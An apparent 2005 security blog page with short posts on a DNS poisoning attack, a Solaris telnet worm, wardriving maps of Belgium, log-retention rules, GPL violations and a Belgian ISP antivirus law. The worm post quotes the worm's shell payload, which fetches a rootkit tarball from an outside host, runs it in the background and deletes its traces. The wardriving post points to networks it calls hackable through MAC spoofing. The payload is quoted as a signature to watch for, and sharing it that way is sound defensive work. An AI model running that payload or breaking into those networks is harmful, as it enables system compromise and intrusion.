31-03-05

dns poisioning attacks goings big-scale

why write a virus if you could change the ip address of each .com site someone types who uses a certain DNS server so that it comes automatically at a site where the spyware can be loaded on the pc ?
well, that is what is happening now in the US
it is the first bigscale attack on a commercial big dns server and one that is poisioning the whole traffic going to .com sites (because dns servers help each other and refer to each other to balance the load of the traffic).
 
what is more interesting is that it is a zero day attack, no one has a clue how this is being done, the hackers are in control here
 
a few weeks ago everybody was laughing about an american who in a dutch new IT monthly claimed he could do just that, impossible said the whole IT Security specialist industry
 
well, they are doing it since a week, going a step further each time
 
what can you do ?
- get up your own dns servers behind your firewall and don't depend so much on others or be able to change the external dns servers
- direct all your network traffic to very specific dns servers and block all the rest
- just stop clicking yes on everything you see and receive
 
blocking this
209.123.63.168 / 64.21.61.5 / 205.162.201.11
malicious DNS server is 216.127.88.131
vparivalka .org
 
thank g. there is an internet storm center
http://isc.sans.org/diary.php?date=2005-03-30
 

00:39 Gepost door technology changes fast not a lot | Permalink | Commentaren (0) |  Facebook |

28-03-05

telnet worm attack against Solaris underway

using ports 25, 513  techniques telnet, rlogin and bruteforce password guessing
following the internet storm center, this is the datapackage to look out for
 
mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp
news@210.121.161.78:/usr/lib/.dl/rk/yatze-SunOS_`/usr/bin/uname -m`.tar . >mrun.sh
echo /usr/bin/tar -xvf yatze-SunOS_`/usr/bin/uname -m`.tar >>mrun.sh
echo cd rk ; /bin/sh go >>mrun.sh
echo cd / ; rm -rf /tmp/.m/* ; rm -rf /tmp/.m >>mrun.sh
/usr/bin/nohup /bin/sh mrun.sh >/dev/null 2>/dev/null &

 
if you still use telnet and rlogin, please consider upgrading to SSH(not putty please)or another secured way to protect this kind of logins
 
if you are compromised, pull your machine off the network, it can take some time before you know why they are doing this
more information about forensic methods on securingit.tk
 

01:22 Gepost door technology changes fast not a lot | Permalink | Commentaren (0) |  Facebook |

25-03-05

small mp3 players are an ecological disaster

I have a small mp3 player with very small batteries
well, I can't find rechargable batteries nor a recharger for them
So I keep throwing away all those batteries - all of them
 
time that someone produces this

17:41 Gepost door technology changes fast not a lot | Permalink | Commentaren (0) |  Facebook |

hack the wireless way all through belgium

http://www.wardrivemap.nl/mappoint/map.aspx?C=51.13956126...
 
wardriving through the powerstreets of brussels
http://www.wardrivemap.nl/mappoint/map.aspx?C=50.84639022...
 
on this level you will see the network ID's that are hackable (you only need the macadress that you can spoof) when you pinpoint to the connection point
http://www.wardrivemap.nl/mappoint/map.aspx?C=50.85040390...
 
wireless, no wires, no security

17:33 Gepost door technology changes fast not a lot | Permalink | Commentaren (0) |  Facebook |

log retention - the next frontier

these are the international laws and regulations you will have to comply with, even if you are not an US based firm, having contacts with US institutions, citizens or firms is enough
 

It is also important to have someone knowledgeable of the relevant laws, regulations, and agreements which pertain to your site participate in policy creation and audits. Examples of VISA CISP, SOX, GLBA, FFIEC, Basel II, HIPAA. NISPROM, NERC, Italian Personal Data Protection Code Legislative Decree no. 196 of 30

The Basel II Accord - Affects international banks. Effective 2006. Activity logs should be retained 3-7 years

Federal Financial Institutions Examination Council (FFIEC) - Affects financial institutions governed by the Federal Reserve, FDIC, etc. Specifies historical retention.

Gramm-Leach-Bliley Act (GLBA) - Affects entities that participate in financial institution activities.

The Health Insurance Portability and Accountability Act (HIPAA) - Affects healthcare industry. Logs should be retained up to 6 years.

North American Electric Reliability Council (NERC) - Affects electric power providers. Specifies log retention for 6 months and audit record retention for 3 years.

National Industrial Security Program Operating Manual (NISPOM) - Specifies log retention of at least one year.

The Sarbanes-Oxley Act (SOX) - Affects US Corporations. Specifies retaining audit logs for up to seven years.

VISA Cardholder Information Security Program (CISP) - Specifies retaining audit logs for at least six months.

source Internet Storm Center

Keeping logs safely is a very costly matter that should be studied as a very serious matter if your organisation is little big bigger than 20 members

Even selecting what to log where is a problem that can bring your whole system or network down, because it can clog everything very quickly down


17:01 Gepost door technology changes fast not a lot | Permalink | Commentaren (0) |  Facebook |

and you thought you understood open source

well you thought you could do all kind of stuff and so on, but you didn't read the fine lines or didn't see that there are different kinds of GPL licence and that software can change from version
well, than you can get into trouble like these firms here http://www.gpl-violations.org/
 
you thought it was free and easy ?

16:21 Gepost door technology changes fast not a lot | Permalink | Commentaren (0) |  Facebook |

belgium is the first to block viruses ISP wise

Yes, we are a small country (that is hosting the European Commission, NATO and Shape, EuroClear and so on) and yes it is something that will be have to be built up stone by stone and yes it is first and foremost to hold off wormbased attacks and protect the simple users that just want to do some surfing, banking and some of that stuff.
 
but we are, believing the director of the internet storm center, the first to put an internet watch center under the guidance of the regulator of the same industry, not some freestanding association without any cloud, even if they can count on much goodwill.
 
The Belgian Telecom law to be voted in the belgian federal parliament in the weeks to come will have in it the obligation for the ISP's to protect their networks and to protect their users and to install a Belgian Internet Storm Center. Thanks, Phillippe De Coene for the courage and insight. Thanks, for listening and acting. This is what political activism and these blogs are about, hoping that someday someone somewhere will change something for the better and that some ideas or parts of it can find its way. www.veiligecomputer.be
 
this means that if all goes well, belgian pc's will have an antivirus and firewall on their pc, that identified viruses will be stopped at the gateways of the ISP's before coming to a pc and that an internet storm watch center can bring all that know how and goodwill together so in 2 years from here we can say 'my mother worked on the internet and read all her mail and didn't get a virus'.  Just like tapping water.
manifest.skynetblogs.be   virusalerts.skynetblogs.be (2004 the comparaison with the bipt)
 
now, just one step to go and than the big work can begin
that day I will open a bottle of champagne

http://www.dekamer.be/kvvcr/showpage.cfm?section=|flwb|re...   (dutch, the law)
 
dutch article  http://www.zdnet.be/news.cfm?id=44288&mxp=88
 
an article with comments (dutch)  http://www.security.nl/article/10439
 

16:15 Gepost door technology changes fast not a lot | Permalink | Commentaren (0) |  Facebook |